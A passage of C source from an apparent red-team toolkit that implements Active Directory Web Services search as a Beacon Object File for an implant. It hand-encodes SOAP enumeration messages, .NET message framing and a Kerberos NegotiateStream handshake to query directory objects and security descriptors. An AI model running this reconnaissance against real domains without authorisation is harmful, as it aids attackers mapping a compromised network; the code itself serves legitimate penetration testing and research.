    if (!NBFSEBufferAppend(buf, (const BYTE *)prefix, prefixLen))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, (BYTE)nameLen))
        return FALSE;
    return NBFSEBufferAppend(buf, (const BYTE *)name, nameLen);
}

BOOL NBFSEWriteShortAttribute(NBFSE_BUFFER *buf, const char *name)
{
    DWORD nameLen = MSVCRT$strlen(name);

    if (!NBFSEBufferAppendByte(buf, NBFSE_SHORT_ATTRIBUTE))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, (BYTE)nameLen))
        return FALSE;
    return NBFSEBufferAppend(buf, (const BYTE *)name, nameLen);
}

BOOL NBFSEWriteXmlnsAttribute(NBFSE_BUFFER *buf, const char *prefix, const char *ns)
{
    DWORD prefixLen = MSVCRT$strlen(prefix);
    DWORD nsLen = MSVCRT$strlen(ns);

    if (!NBFSEBufferAppendByte(buf, NBFSE_XMLNS_ATTRIBUTE))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, (BYTE)prefixLen))
        return FALSE;
    if (!NBFSEBufferAppend(buf, (const BYTE *)prefix, prefixLen))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, (BYTE)nsLen))
        return FALSE;
    return NBFSEBufferAppend(buf, (const BYTE *)ns, nsLen);
}

BOOL NBFSEWriteDictionaryXmlnsAttribute(NBFSE_BUFFER *buf, const char *prefix, BYTE nsDict)
{
    DWORD prefixLen = MSVCRT$strlen(prefix);

    if (!NBFSEBufferAppendByte(buf, NBFSE_DICTIONARY_XMLNS_ATTRIBUTE))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, (BYTE)prefixLen))
        return FALSE;
    if (!NBFSEBufferAppend(buf, (const BYTE *)prefix, prefixLen))
        return FALSE;
    return NBFSEBufferAppendByte(buf, nsDict);
}

BOOL BuildEnumerateRequest(NBFSE_BUFFER *buf, const char *ldapFilter, const char *baseDN, const char *targetHost, const char *attrFilter)
{
    UUID uuid;

    if (RPCRT4$UuidCreate(&uuid) != RPC_S_OK)
    {
        return FALSE;
    }

    // Empty string table
    if (!NBFSEBufferAppendByte(buf, 0x00))
        return FALSE;

    // <s:Envelope>
    if (!NBFSEBufferAppendByte(buf, NBFSE_PREFIX_DICTIONARY_ELEMENT_S))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, DICT_ENVELOPE))
        return FALSE;

    if (!NBFSEWriteDictionaryXmlnsAttribute(buf, "s", 0x04))
        return FALSE;

    if (!NBFSEWriteDictionaryXmlnsAttribute(buf, "a", 0x06))
        return FALSE;

    // xmlns:addata
    if (!NBFSEWriteXmlnsAttribute(buf, "addata", "http://schemas.microsoft.com/2008/1/ActiveDirectory/Data"))
        return FALSE;

    // xmlns:ad
    if (!NBFSEWriteXmlnsAttribute(buf, "ad", "http://schemas.microsoft.com/2008/1/ActiveDirectory"))
        return FALSE;

    // xmlns:xsd - dictionary 0x374 (encoded as 0xF4 0x06)
    if (!NBFSEBufferAppendByte(buf, NBFSE_DICTIONARY_XMLNS_ATTRIBUTE))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, 0x03))
        return FALSE;
    if (!NBFSEBufferAppend(buf, (const BYTE *)"xsd", 3))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, 0xF4))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, 0x06))
        return FALSE;

    // xmlns:xsi - dictionary 0x372 (encoded as 0xF2 0x06)
    if (!NBFSEBufferAppendByte(buf, NBFSE_DICTIONARY_XMLNS_ATTRIBUTE))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, 0x03))
        return FALSE;
    if (!NBFSEBufferAppend(buf, (const BYTE *)"xsi", 3))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, 0xF2))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, 0x06))
        return FALSE;

    // <s:Header>
    if (!NBFSEBufferAppendByte(buf, NBFSE_PREFIX_DICTIONARY_ELEMENT_S))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, DICT_HEADER))
        return FALSE;

    // <a:Action s:mustUnderstand="1">
    if (!NBFSEBufferAppendByte(buf, NBFSE_PREFIX_DICTIONARY_ELEMENT_A))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, DICT_ACTION))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, NBFSE_PREFIX_DICTIONARY_ATTRIBUTE_S))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, DICT_MUSTUNDERSTAND))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, NBFSE_BOOL_TEXT_TRUE))
        return FALSE;

    // Action URL
    if (!NBFSEWriteChars8Text(buf, "http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enumerate", TRUE))
        return FALSE;

    // <ad:instance>
    if (!NBFSEWriteElement(buf, "ad", "instance"))
        return FALSE;
    if (!NBFSEWriteChars8Text(buf, "ldap:389", TRUE))
        return FALSE;

    // <a:MessageID>
    if (!NBFSEBufferAppendByte(buf, NBFSE_PREFIX_DICTIONARY_ELEMENT_A))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, DICT_MESSAGEID))
        return FALSE;
    if (!NBFSEWriteUniqueIdText(buf, &uuid))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, NBFSE_END_ELEMENT))
        return FALSE;

    // <a:ReplyTo>
    if (!NBFSEBufferAppendByte(buf, NBFSE_PREFIX_DICTIONARY_ELEMENT_A))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, DICT_REPLYTO))
        return FALSE;

    // <a:Address>
    if (!NBFSEBufferAppendByte(buf, NBFSE_PREFIX_DICTIONARY_ELEMENT_A))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, DICT_ADDRESS))
        return FALSE;
    if (!NBFSEWriteDictionaryText(buf, 0x14, TRUE))
        return FALSE;

    if (!NBFSEBufferAppendByte(buf, NBFSE_END_ELEMENT))
        return FALSE;

    // <a:To s:mustUnderstand="1">
    if (!NBFSEBufferAppendByte(buf, NBFSE_PREFIX_DICTIONARY_ELEMENT_A))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, DICT_TO))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, NBFSE_PREFIX_DICTIONARY_ATTRIBUTE_S))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, DICT_MUSTUNDERSTAND))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, NBFSE_BOOL_TEXT_TRUE))
        return FALSE;

    // Build To URL
    char toUrl[512];
    MSVCRT$sprintf(toUrl, "net.tcp://%s:9389/ActiveDirectoryWebServices/Windows/Enumeration", targetHost);
    if (!NBFSEWriteChars8Text(buf, toUrl, TRUE))
        return FALSE;

    if (!NBFSEBufferAppendByte(buf, NBFSE_END_ELEMENT))
        return FALSE;

    // <s:Body>
    if (!NBFSEBufferAppendByte(buf, NBFSE_PREFIX_DICTIONARY_ELEMENT_S))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, DICT_BODY))
        return FALSE;

    // Move xmlns declarations to Body element (not Envelope)
    // xmlns:wsen
    if (!NBFSEWriteXmlnsAttribute(buf, "wsen", "http://schemas.xmlsoap.org/ws/2004/09/enumeration"))
        return FALSE;

    // xmlns:adlq
    if (!NBFSEWriteXmlnsAttribute(buf, "adlq", "http://schemas.microsoft.com/2008/1/ActiveDirectory/Dialect/LdapQuery"))
        return FALSE;

    // <wsen:Enumerate>
    if (!NBFSEWriteElement(buf, "wsen", "Enumerate"))
        return FALSE;

    if (!NBFSEWriteElement(buf, "wsen", "Filter"))
        return FALSE;
    if (!NBFSEWriteShortAttribute(buf, "Dialect"))
        return FALSE;
    if (!NBFSEWriteChars8Text(buf, "http://schemas.microsoft.com/2008/1/ActiveDirectory/Dialect/LdapQuery", FALSE))
        return FALSE;

    // <adlq:LdapQuery>
    if (!NBFSEWriteElement(buf, "adlq", "LdapQuery"))
        return FALSE;

    // <adlq:Filter>
    if (!NBFSEWriteElement(buf, "adlq", "Filter"))
        return FALSE;
    if (!NBFSEWriteChars8Text(buf, ldapFilter, TRUE))
        return FALSE;

    // <adlq:BaseObject>
    if (!NBFSEWriteElement(buf, "adlq", "BaseObject"))
        return FALSE;
    if (!NBFSEWriteChars8Text(buf, baseDN, TRUE))
        return FALSE;

    // <adlq:Scope>
    if (!NBFSEWriteElement(buf, "adlq", "Scope"))
        return FALSE;
    if (!NBFSEWriteChars8Text(buf, "Subtree", TRUE))
        return FALSE;

    if (!NBFSEBufferAppendByte(buf, NBFSE_END_ELEMENT))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, NBFSE_END_ELEMENT))
        return FALSE;

    // Add Selection element if attribute filter is provided (limits what server returns)
    if (attrFilter && MSVCRT$strlen(attrFilter) > 0)
    {
        // <ad:Selection Dialect="http://schemas.microsoft.com/2008/1/ActiveDirectory/Dialect/XPath-Level-1">
        if (!NBFSEWriteElement(buf, "ad", "Selection"))
            return FALSE;
        if (!NBFSEWriteShortAttribute(buf, "Dialect"))
            return FALSE;
        if (!NBFSEWriteChars8Text(buf, "http://schemas.microsoft.com/2008/1/ActiveDirectory/Dialect/XPath-Level-1", FALSE))
            return FALSE;

        // Always add distinguishedName
        // <ad:SelectionProperty>addata:distinguishedname</ad:SelectionProperty>
        if (!NBFSEWriteElement(buf, "ad", "SelectionProperty"))
            return FALSE;
        if (!NBFSEWriteChars8Text(buf, "addata:distinguishedname", TRUE))
            return FALSE;

        // Parse comma-separated attributes and add each one
        char filterCopy[512];
        MSVCRT$strncpy(filterCopy, attrFilter, 511);
        filterCopy[511] = '\0';

        char *token = MSVCRT$strtok(filterCopy, ",");
        while (token != NULL)
        {
            while (*token == ' ')
                token++;

            // <ad:SelectionProperty>addata:attributename</ad:SelectionProperty>
            if (!NBFSEWriteElement(buf, "ad", "SelectionProperty"))
                return FALSE;

            // Build "addata:attributename" string
            char attrName[256];
            MSVCRT$sprintf(attrName, "addata:%s", token);
            if (!NBFSEWriteChars8Text(buf, attrName, TRUE))
                return FALSE;

            token = MSVCRT$strtok(NULL, ",");
        }

        if (!NBFSEBufferAppendByte(buf, NBFSE_END_ELEMENT))
            return FALSE;
    }

    // LDAP control for nTSecurityDescriptor without SACL (needed when getting ALL attributes)
    if (!NBFSEWriteElement(buf, "ad", "controls"))
        return FALSE;

    // <ad:control type="1.2.840.113556.1.4.801" criticality="true">
    if (!NBFSEWriteElement(buf, "ad", "control"))
        return FALSE;
    if (!NBFSEWriteShortAttribute(buf, "type"))
        return FALSE;
    if (!NBFSEWriteChars8Text(buf, "1.2.840.113556.1.4.801", FALSE))
        return FALSE;
    if (!NBFSEWriteShortAttribute(buf, "criticality"))
        return FALSE;
    if (!NBFSEWriteChars8Text(buf, "true", FALSE))
        return FALSE;

    // <ad:controlValue>MAMCAQc=</ad:controlValue>
    if (!NBFSEWriteElement(buf, "ad", "controlValue"))
        return FALSE;
    if (!NBFSEWriteChars8Text(buf, "MAMCAQc=", TRUE))
        return FALSE; // Base64 of 30 03 02 01 07

    if (!NBFSEBufferAppendByte(buf, NBFSE_END_ELEMENT))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, NBFSE_END_ELEMENT))
        return FALSE;

    if (!NBFSEBufferAppendByte(buf, NBFSE_END_ELEMENT))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, NBFSE_END_ELEMENT))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, NBFSE_END_ELEMENT))
        return FALSE;

    return TRUE;
}

BOOL BuildPullRequest(NBFSE_BUFFER *buf, const char *enumContext, DWORD maxElements, const char *targetHost)
{
    // Empty string table
    if (!NBFSEBufferAppendByte(buf, 0x00))
        return FALSE;

    // <s:Envelope>
    if (!NBFSEBufferAppendByte(buf, NBFSE_PREFIX_DICTIONARY_ELEMENT_S))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, DICT_ENVELOPE))
        return FALSE;

    // xmlns:s
    if (!NBFSEWriteDictionaryXmlnsAttribute(buf, "s", 0x04))
        return FALSE;

    // xmlns:a
    if (!NBFSEWriteDictionaryXmlnsAttribute(buf, "a", 0x06))
        return FALSE;

    // xmlns:ad
    if (!NBFSEWriteXmlnsAttribute(buf, "ad", "http://schemas.microsoft.com/2008/1/ActiveDirectory"))
        return FALSE;

    UUID uuid;
    if (RPCRT4$UuidCreate(&uuid) != RPC_S_OK)
    {
        return FALSE;
    }

    // <s:Header>
    if (!NBFSEBufferAppendByte(buf, NBFSE_PREFIX_DICTIONARY_ELEMENT_S))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, DICT_HEADER))
        return FALSE;

    // <a:Action s:mustUnderstand="1">
    if (!NBFSEBufferAppendByte(buf, NBFSE_PREFIX_DICTIONARY_ELEMENT_A))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, DICT_ACTION))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, NBFSE_PREFIX_DICTIONARY_ATTRIBUTE_S))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, DICT_MUSTUNDERSTAND))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, NBFSE_BOOL_TEXT_TRUE))
        return FALSE;

    // Action URL
    if (!NBFSEWriteChars8Text(buf, "http://schemas.xmlsoap.org/ws/2004/09/enumeration/Pull", TRUE))
        return FALSE;

    // <a:MessageID>
    if (!NBFSEBufferAppendByte(buf, NBFSE_PREFIX_DICTIONARY_ELEMENT_A))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, DICT_MESSAGEID))
        return FALSE;
    if (!NBFSEWriteUniqueIdText(buf, &uuid))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, NBFSE_END_ELEMENT))
        return FALSE;

    // <a:ReplyTo>
    if (!NBFSEBufferAppendByte(buf, NBFSE_PREFIX_DICTIONARY_ELEMENT_A))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, DICT_REPLYTO))
        return FALSE;

    // <a:Address>
    if (!NBFSEBufferAppendByte(buf, NBFSE_PREFIX_DICTIONARY_ELEMENT_A))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, DICT_ADDRESS))
        return FALSE;
    if (!NBFSEWriteDictionaryText(buf, 0x14, TRUE))
        return FALSE;

    if (!NBFSEBufferAppendByte(buf, NBFSE_END_ELEMENT))
        return FALSE;

    // <a:To s:mustUnderstand="1">
    if (!NBFSEBufferAppendByte(buf, NBFSE_PREFIX_DICTIONARY_ELEMENT_A))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, DICT_TO))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, NBFSE_PREFIX_DICTIONARY_ATTRIBUTE_S))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, DICT_MUSTUNDERSTAND))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, NBFSE_BOOL_TEXT_TRUE))
        return FALSE;

    char toUrl[512];
    MSVCRT$sprintf(toUrl, "net.tcp://%s:9389/ActiveDirectoryWebServices/Windows/Enumeration", targetHost);
    if (!NBFSEWriteChars8Text(buf, toUrl, TRUE))
        return FALSE;

    if (!NBFSEBufferAppendByte(buf, NBFSE_END_ELEMENT))
        return FALSE;

    // <s:Body>
    if (!NBFSEBufferAppendByte(buf, NBFSE_PREFIX_DICTIONARY_ELEMENT_S))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, DICT_BODY))
        return FALSE;

    // xmlns:wsen
    if (!NBFSEWriteXmlnsAttribute(buf, "wsen", "http://schemas.xmlsoap.org/ws/2004/09/enumeration"))
        return FALSE;

    // <wsen:Pull>
    if (!NBFSEWriteElement(buf, "wsen", "Pull"))
        return FALSE;

    // <wsen:EnumerationContext>
    if (!NBFSEWriteElement(buf, "wsen", "EnumerationContext"))
        return FALSE;
    if (!NBFSEWriteChars8Text(buf, enumContext, TRUE))
        return FALSE;

    // <wsen:MaxElements>
    if (!NBFSEWriteElement(buf, "wsen", "MaxElements"))
        return FALSE;
    char maxElemStr[32];
    MSVCRT$sprintf(maxElemStr, "%d", maxElements);
    if (!NBFSEWriteChars8Text(buf, maxElemStr, TRUE))
        return FALSE;

    // LDAP control - always added to get security descriptor
    if (!NBFSEWriteElement(buf, "ad", "controls"))
        return FALSE;

    // <ad:control type="1.2.840.113556.1.4.801" criticality="true">
    if (!NBFSEWriteElement(buf, "ad", "control"))
        return FALSE;
    if (!NBFSEWriteShortAttribute(buf, "type"))
        return FALSE;
    if (!NBFSEWriteChars8Text(buf, "1.2.840.113556.1.4.801", FALSE))
        return FALSE;
    if (!NBFSEWriteShortAttribute(buf, "criticality"))
        return FALSE;
    if (!NBFSEWriteChars8Text(buf, "true", FALSE))
        return FALSE;

    // <ad:controlValue>
    if (!NBFSEWriteElement(buf, "ad", "controlValue"))
        return FALSE;
    if (!NBFSEWriteChars8Text(buf, "MAMCAQc=", TRUE))
        return FALSE; // Base64 of 30 03 02 01 07

    if (!NBFSEBufferAppendByte(buf, NBFSE_END_ELEMENT))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, NBFSE_END_ELEMENT))
        return FALSE;

    if (!NBFSEBufferAppendByte(buf, NBFSE_END_ELEMENT))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, NBFSE_END_ELEMENT))
        return FALSE;
    if (!NBFSEBufferAppendByte(buf, NBFSE_END_ELEMENT))
        return FALSE;

    return TRUE;
}

#endif


================================================
FILE: AD-BOF/adwssearch/nmf.h
================================================
/*
 * nmf.h - .NET Message Framing Protocol
 *
 * Functions for handling Microsoft's .NET Message Framing (NMF) protocol
 * which provides framing for SOAP messages over TCP.
 */

#ifndef NMF_H
#define NMF_H

#ifdef BOF
#include "bofdefs.h"
#else
#include <windows.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#endif

#define NMF_VERSION_RECORD 0x00
#define NMF_MODE_RECORD 0x01
#define NMF_VIA_RECORD 0x02
#define NMF_ENCODING_RECORD 0x03
#define NMF_SIZED_ENVELOPE 0x06
#define NMF_UPGRADE_REQUEST 0x09
#define NMF_UPGRADE_RESPONSE 0x0A
#define NMF_PREAMBLE_ACK 0x0B
#define NMF_PREAMBLE_END 0x0C

// CONNECTION_CONTEXT is defined in nns.h
typedef struct CONNECTION_CONTEXT CONNECTION_CONTEXT;
BOOL NNSSendEncrypted(CONNECTION_CONTEXT *ctx, PBYTE data, DWORD dataLen);

BOOL SendNMFHandshake(SOCKET socket, const char *target);
BOOL UnwrapNMFEnvelope(BYTE *nmfData, DWORD nmfLen, BYTE **nbfseData, DWORD *nbfseLen);
BOOL SendADWSMessage(CONNECTION_CONTEXT *ctx, BYTE *nbfseMessage, DWORD nbfseLen);

// Send NMF handshake
BOOL SendNMFHandshake(SOCKET socket, const char *target)
{
    BYTE *handshakeBuffer = NULL;
    BYTE *responseBuffer = NULL;
    int offset = 0;
    int ret;
    char viaString[256];
    int viaLen;
    BOOL success = FALSE;

    handshakeBuffer = (BYTE *)intAlloc(512);
    responseBuffer = (BYTE *)intAlloc(256);
    if (!handshakeBuffer || !responseBuffer)
    {
        goto cleanup;
    }

    MSVCRT$sprintf(viaString, "net.tcp://%s:9389/ActiveDirectoryWebServices/Windows/Enumeration", target);
    viaLen = MSVCRT$strlen(viaString);

    handshakeBuffer[offset++] = NMF_VERSION_RECORD;
    handshakeBuffer[offset++] = 0x01; // Major
    handshakeBuffer[offset++] = 0x00; // Minor

    handshakeBuffer[offset++] = NMF_MODE_RECORD;
    handshakeBuffer[offset++] = 0x02; // Duplex

    handshakeBuffer[offset++] = NMF_VIA_RECORD;
    handshakeBuffer[offset++] = (BYTE)viaLen;
    MSVCRT$memcpy(&handshakeBuffer[offset], viaString, viaLen);
    offset += viaLen;

    handshakeBuffer[offset++] = NMF_ENCODING_RECORD;
    handshakeBuffer[offset++] = 0x08; // NBFSE

    handshakeBuffer[offset++] = NMF_UPGRADE_REQUEST;
    handshakeBuffer[offset++] = 0x15; // Length
    MSVCRT$memcpy(&handshakeBuffer[offset], "application/negotiate", 0x15);
    offset += 0x15;

    ret = WS2_32$send(socket, (char *)handshakeBuffer, offset, 0);
    if (ret == SOCKET_ERROR)
    {
        goto cleanup;
    }

    ret = WS2_32$recv(socket, (char *)responseBuffer, 256, 0);
    if (ret <= 0 || responseBuffer[0] != NMF_UPGRADE_RESPONSE)
    {
        goto cleanup;
    }

    success = TRUE;

cleanup:
    if (handshakeBuffer)
        intFree(handshakeBuffer);
    if (responseBuffer)
        intFree(responseBuffer);
    return success;
}

// Unwrap NMF envelope to extract NBFSE payload
BOOL UnwrapNMFEnvelope(BYTE *nmfData, DWORD nmfLen, BYTE **nbfseData, DWORD *nbfseLen)
{
    DWORD offset = 0;

    if (nmfLen < 2 || nmfData[0] != NMF_SIZED_ENVELOPE)
    {
        BeaconPrintf(CALLBACK_OUTPUT, "[-] Not an NMF envelope (first byte: 0x%02X)", nmfLen > 0 ? nmfData[0] : 0);
        return FALSE;
    }
    offset++;

    DWORD payloadLen = 0;
    BYTE firstByte = nmfData[offset++];

    if ((firstByte & 0x80) == 0)
    {
        payloadLen = firstByte;
    }
    else
    {
        payloadLen = firstByte & 0x7F;
        int shift = 7;

        while (offset < nmfLen && shift < 32)
        {
            BYTE nextByte = nmfData[offset++];
            payloadLen |= (DWORD)(nextByte & 0x7F) << shift;

            if ((nextByte & 0x80) == 0)
            {
                break;
            }

            shift += 7;
        }
    }

    if (payloadLen > nmfLen - offset)
    {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] NMF payload truncated: expected %d bytes, have %d bytes\n", payloadLen,
                     nmfLen - offset);

        *nbfseLen = nmfLen - offset;
        *nbfseData = (BYTE *)intAlloc(*nbfseLen);
        if (!*nbfseData)
            return FALSE;

        MSVCRT$memcpy(*nbfseData, nmfData + offset, *nbfseLen);
        return TRUE;
    }

    *nbfseData = (BYTE *)intAlloc(payloadLen);
    if (!*nbfseData)
        return FALSE;

    MSVCRT$memcpy(*nbfseData, nmfData + offset, payloadLen);
    *nbfseLen = payloadLen;

    return TRUE;
}

// Send ADWS message (wraps NBFSE in NMF envelope and sends via NNS)
BOOL SendADWSMessage(CONNECTION_CONTEXT *ctx, BYTE *nbfseMessage, DWORD nbfseLen)
{
    BYTE *nmfMessage = NULL;
    DWORD nmfLen;
    BOOL result = FALSE;

    // Build NMF envelope (0x06 + varint length + payload)
    BYTE varintBytes[5];
    DWORD varintLen = 0;

    // Encode length as varint
    if (nbfseLen < 0x80)
    {
        varintBytes[0] = (BYTE)nbfseLen;
        varintLen = 1;
    }
    else if (nbfseLen < 0x4000)
    {
        varintBytes[0] = (BYTE)(0x80 | (nbfseLen & 0x7F));
        varintBytes[1] = (BYTE)(nbfseLen >> 7);
        varintLen = 2;
    }
    else if (nbfseLen < 0x200000)
    {
        varintBytes[0] = (BYTE)(0x80 | (nbfseLen & 0x7F));
        varintBytes[1] = (BYTE)(0x80 | ((nbfseLen >> 7) & 0x7F));
        varintBytes[2] = (BYTE)(nbfseLen >> 14);
        varintLen = 3;
    }
    else if (nbfseLen < 0x10000000)
    {
        varintBytes[0] = (BYTE)(0x80 | (nbfseLen & 0x7F));
        varintBytes[1] = (BYTE)(0x80 | ((nbfseLen >> 7) & 0x7F));
        varintBytes[2] = (BYTE)(0x80 | ((nbfseLen >> 14) & 0x7F));
        varintBytes[3] = (BYTE)(nbfseLen >> 21);
        varintLen = 4;
    }
    else
    {
        varintBytes[0] = (BYTE)(0x80 | (nbfseLen & 0x7F));
        varintBytes[1] = (BYTE)(0x80 | ((nbfseLen >> 7) & 0x7F));
        varintBytes[2] = (BYTE)(0x80 | ((nbfseLen >> 14) & 0x7F));
        varintBytes[3] = (BYTE)(0x80 | ((nbfseLen >> 21) & 0x7F));
        varintBytes[4] = (BYTE)(nbfseLen >> 28);
        varintLen = 5;
    }

    // Allocate NMF message
    nmfLen = 1 + varintLen + nbfseLen;
    nmfMessage = (BYTE *)intAlloc(nmfLen);
    if (!nmfMessage)
        return FALSE;

    // Build NMF message
    nmfMessage[0] = NMF_SIZED_ENVELOPE;
    MSVCRT$memcpy(nmfMessage + 1, varintBytes, varintLen);
    MSVCRT$memcpy(nmfMessage + 1 + varintLen, nbfseMessage, nbfseLen);

    // Silent - sending NMF envelope
    // Send through encrypted channel
    result = NNSSendEncrypted(ctx, nmfMessage, nmfLen);

    intFree(nmfMessage);
    return result;
}

#endif


================================================
FILE: AD-BOF/adwssearch/nns.h
================================================
/*
 * nns.h - .NET NegotiateStream Protocol
 *
 * Functions for handling .NET's NegotiateStream secure transport protocol
 * including SSPI/Kerberos authentication and encrypted communication.
 */

#ifndef NNS_H
#define NNS_H

#define SECURITY_WIN32

#ifdef BOF
#include "bofdefs.h"
#else
#include <security.h>
#include <windows.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#endif

#define NNS_HANDSHAKE_IN_PROGRESS 0x16
#define NNS_HANDSHAKE_DONE 0x14
#define NNS_MAJOR_VERSION 1
#define NNS_MINOR_VERSION 0

#define NMF_PREAMBLE_ACK 0x0B
#define NMF_PREAMBLE_END 0x0C
#define NMF_SIZED_ENVELOPE 0x06

typedef struct CONNECTION_CONTEXT
{
    SOCKET socket;
    BOOL isConnected;
    WSADATA wsaData;
    CredHandle hCred;
    CtxtHandle hContext;
    BOOL hasContext;
    BOOL isAuthenticated;
    SecPkgContext_Sizes sizes;
} CONNECTION_CONTEXT;

BOOL PerformNNSHandshake(CONNECTION_CONTEXT *ctx, const char *target);
BOOL NNSSendMessage(SOCKET socket, BYTE type, PBYTE data, DWORD dataLen);
BOOL NNSReceiveMessage(SOCKET socket, BYTE *type, PBYTE *data, DWORD *dataLen);
BOOL NNSSendEncrypted(CONNECTION_CONTEXT *ctx, PBYTE data, DWORD dataLen);
BOOL NNSReceiveEncrypted(CONNECTION_CONTEXT *ctx, PBYTE *data, DWORD *dataLen);

// Perform NNS authentication handshake
BOOL PerformNNSHandshake(CONNECTION_CONTEXT *ctx, const char *target)
{
    SECURITY_STATUS status;
    SecBufferDesc outBufferDesc;
    SecBuffer outBuffer;
    SecBufferDesc inBufferDesc;
    SecBuffer inBuffer;
    ULONG contextAttr;
    TimeStamp expiry;
    WCHAR targetSPN[512];
    BYTE *tokenBuffer = NULL;
    BYTE *recvBuffer = NULL;
    DWORD tokenSize = 0;
    BYTE messageType;
    BOOL firstCall = TRUE;

    // Needs ADWS/ prefix for Kerberos
    char spnNarrow[512];
    MSVCRT$memset(targetSPN, 0, sizeof(targetSPN));
    MSVCRT$sprintf(spnNarrow, "ADWS/%s", target);
    KERNEL32$MultiByteToWideChar(CP_UTF8, 0, spnNarrow, -1, targetSPN, 256);

    status = SECUR32$AcquireCredentialsHandleW(NULL, L"Negotiate", SECPKG_CRED_OUTBOUND, NULL, NULL, NULL, NULL,
                                               &ctx->hCred, &expiry);

    if (status != SEC_E_OK)
    {
        BeaconPrintf(CALLBACK_OUTPUT, "[-] AcquireCredentialsHandle failed: 0x%08X\n", status);
        return FALSE;
    }

    do
    {
        tokenBuffer = (BYTE *)intAlloc(16384);
        if (!tokenBuffer)
        {
            return FALSE;
        }

        outBuffer.BufferType = SECBUFFER_TOKEN;
        outBuffer.cbBuffer = 16384;
        outBuffer.pvBuffer = tokenBuffer;

        outBufferDesc.ulVersion = SECBUFFER_VERSION;
        outBufferDesc.cBuffers = 1;
        outBufferDesc.pBuffers = &outBuffer;

        if (!firstCall && recvBuffer)
        {
            inBuffer.BufferType = SECBUFFER_TOKEN;
            inBuffer.cbBuffer = tokenSize;
            inBuffer.pvBuffer = recvBuffer;

            inBufferDesc.ulVersion = SECBUFFER_VERSION;
            inBufferDesc.cBuffers = 1;
            inBufferDesc.pBuffers = &inBuffer;
        }

        status = SECUR32$InitializeSecurityContextW(&ctx->hCred, firstCall ? NULL : &ctx->hContext, targetSPN,
                                                    ISC_REQ_ALLOCATE_MEMORY | ISC_REQ_CONFIDENTIALITY |
                                                        ISC_REQ_INTEGRITY | ISC_REQ_MUTUAL_AUTH |
                                                        ISC_REQ_USE_SUPPLIED_CREDS | ISC_REQ_EXTENDED_ERROR,
                                                    0, SECURITY_NETWORK_DREP, firstCall ? NULL : &inBufferDesc, 0,
                                                    &ctx->hContext, &outBufferDesc, &contextAttr, &expiry);

        ctx->hasContext = TRUE;
        firstCall = FALSE;

        if (outBuffer.cbBuffer > 0)
        {

            if (!NNSSendMessage(ctx->socket, NNS_HANDSHAKE_IN_PROGRESS, (PBYTE)outBuffer.pvBuffer, outBuffer.cbBuffer))
            {
                intFree(tokenBuffer);
                SECUR32$FreeContextBuffer(outBuffer.pvBuffer);
                return FALSE;
            }
        }

        if (outBuffer.pvBuffer)
        {
            SECUR32$FreeContextBuffer(outBuffer.pvBuffer);
        }
        intFree(tokenBuffer);

        if (status == SEC_I_CONTINUE_NEEDED)
        {
            if (recvBuffer)
            {
                intFree(recvBuffer);
                recvBuffer = NULL;
            }

            if (!NNSReceiveMessage(ctx->socket, &messageType, &recvBuffer, &tokenSize))
            {
                return FALSE;
            }

            if (messageType != NNS_HANDSHAKE_IN_PROGRESS)
            {
                BeaconPrintf(CALLBACK_OUTPUT, "[-] Unexpected message type: 0x%02X\n", messageType);
                intFree(recvBuffer);
                return FALSE;
            }
        }

    } while (status == SEC_I_CONTINUE_NEEDED);

    if (status != SEC_E_OK)
    {
        BeaconPrintf(CALLBACK_OUTPUT, "[-] Authentication failed: 0x%08X\n", status);
        return FALSE;
    }

    if (recvBuffer)
    {
        intFree(recvBuffer);
        recvBuffer = NULL;
    }

    BYTE *doneBuffer = NULL;
    DWORD doneSize = 0;
    if (!NNSReceiveMessage(ctx->socket, &messageType, &doneBuffer, &doneSize))
    {
        return FALSE;
    }

    if (messageType != NNS_HANDSHAKE_DONE)
    {
